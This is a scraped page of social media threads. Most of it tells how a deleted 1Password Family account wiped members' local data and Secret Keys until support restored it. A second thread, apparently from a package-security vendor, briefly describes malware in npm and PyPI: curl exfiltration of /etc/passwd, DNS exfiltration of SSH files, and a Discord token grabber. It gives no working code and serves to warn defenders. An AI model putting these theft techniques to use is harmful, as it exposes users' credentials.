My friend has a @1Password Family subscription and let the credit card lapse. She didn't notice the emails asking to update the card.
1Password completely deleted her account and logged her out on all devices. Now she can't access her 100+ passwords and 2FA tokens
WTF
I feel terrible because I recommended @1Password to her as I have to countless friends over the years.
For as long as I've used 1Password, their policy was to make passwords read-only when a license or subscription expires. Never to remotely wipe your passwords as punishment
She's now been logged out and had her passwords wiped on both her Mac and iOS devices and hasn't been able to access her accounts for several days.
@1Password support - can you fix this now, please?
The 1Password app should NEVER delete data. And it should ESPECIALLY never do so because of an expired credit card.
This completely destroys my trust in the app.
Imagine waking up tomorrow and all your data has been remotely wiped from your 1Password apps on all devices.
@1Password - If you're reading this, please DM me so I can share her account's email address. I would love to see you get to the bottom of this.
UPDATE: So here's what happened.
My friend added her brother as an Owner on the family plan. He signed up, tried 1Password for a day, and stopped using it.
1.5 years go by.
Then, the emails about an expired credit card start coming, but they're sent to both of them.
The brother sees the expired card emails for the Family account. By this time he has his own Individual 1Password account.
He thinks the emails are from that time he tried 1Password a few years ago, so he clicks a link in the email and deletes the account.
The Family account.
What's surprising is he was able to delete the whole Family account without logging in. It's the one action you can take as an Owner without logging in. You just need to access to the email address.
No master password, no secret key.
Lesson: any Owner can delete the whole Family account, even one who hasn't logged in for years, forgot they're an Owner, and isn't actively using their user account anymore.
I recommend everyone audit who has Owner on your Family account. Remove anyone who isn't active anymore.
One more surprising detail:
Once the Family account was deleted, the local data was wiped from all the devices of the other members in the Family account.
Remote wiping makes sense for company accounts where you want to wipe when an employee leaves. But not for families.
If one family member gets tired of paying, switches away from 1Password, and deletes the account, then the other users in the family should have a happy path to get their data out.
They should still be able to access their passwords, even if in read-only mode.
1Password should have sent a message explaining that her Family account was deleted and asking if she wants to pay for an individual account, or switch into read-only mode, or something!
But wiping the *remote and local* data and saying "Account Deleted" is wrong.
Fortunately, 1Password can recover deleted accounts for 35 days after deletion. They're now working on doing that for her account.
But the bigger problem is that this wiping behavior clears the Secret Key from all the logged in devices.
Many users rely on their logged-in devices to produce their Secret Key so they can log in to new devices.
By logging out and wiping all devices, the user is forced to rely on their offline copy of the Secret Key (the Emergency Kit) to get back into their account.
So, even once 1Password restores the deleted account, anyone who didn't save their Emergency Kit (which is a terrible mistake, to be clear) might be locked out.
Lesson: this design should be improved.
Lesson: Double-check your Emergency Kit. Do you know where it is?
Still waiting for support to un-delete her account, but I'm hopeful that this story will have a happy ending now.
Huge thanks to the 1P employees who have been super helpful over DM.
I'm still planning to remain a 1Password customer.
Hopeful there are some lessons to be learned here that lead to better UX and give family members a way to keep their data when the owner deletes the account.
I'll update this thread once my friend is back into her account.
She’s back into her account! 🔥🔥
Thanks to 1Password for all the help!
Several employees, especially @zck, went above and beyond to personally help resolve this. And @jpgoldberg agreed that the way secret keys are handled for deleted family accounts can be improved.
❤️✨❤️✨
• • •
Missing some Tweet in this thread? You can try to
force a refresh
I wish more developers understood the constant stream of malware that is posted to npm, PyPI, and all package managers...
Here's just a taste of some crazy malware Socket identified in the past couple weeks...
All malware descriptions were FULLY WRITTEN by Socket AI.
This code is using curl to send the contents of the file '/etc/passwd' to a remote server. This is a highly suspicious and potentially malicious behavior as it could cause sensitive data to be sent to an attacker's server.
The script collects a wide range of information from the user's system, including OS details, network interfaces, and SSH files, and sends it to a remote server via DNS queries.
Read my latest post, featured in the @github ReadME project!
Do your part to secure the open source supply chain!
WE'RE JUST BEGINNING TO RECKON WITH NEW SECURITY RISKS INTRODUCED BY THE TANGLED WEB OF DEPENDENCIES IN OUR APPS.
Open source ecosystems have transformed 🔄 software development, but they also come with security 🛡 risks due to third-party dependencies. Supply chain attacks are now a significant threat. ⚠️
A supply chain attack involves malicious code 🦠 being injected into a vendor’s software. The rise in third-party dependencies and fast-paced updates 🚀 increases the chances of such attacks.
Our new Project Health Report helps security teams perform a full security audit of a repo. 🔐👩💻👨💻
📊 Unlike real-time Socket Alerts which monitor PRs, Project Health Reports analyze a repo and provide a full list of dependency risks. 📋⚠️
2/ 🕵️♀️ Security teams can use filters to focus on issues of a certain severity, such as "Critical" or "High" issues, or specific issues like "Network access", "Environment variable access" or "Filesystem access." 📈🔍
🤖 Socket AI: “The script contains a discord token grabber function which is a serious security risk. It steals user tokens and sends them to an external server. This is malicious behavior.”
I started by rendering the media viewer for a specific file type (I used .txt randomly). For all other file types, I wanted it to "fall through" to the standard click handler.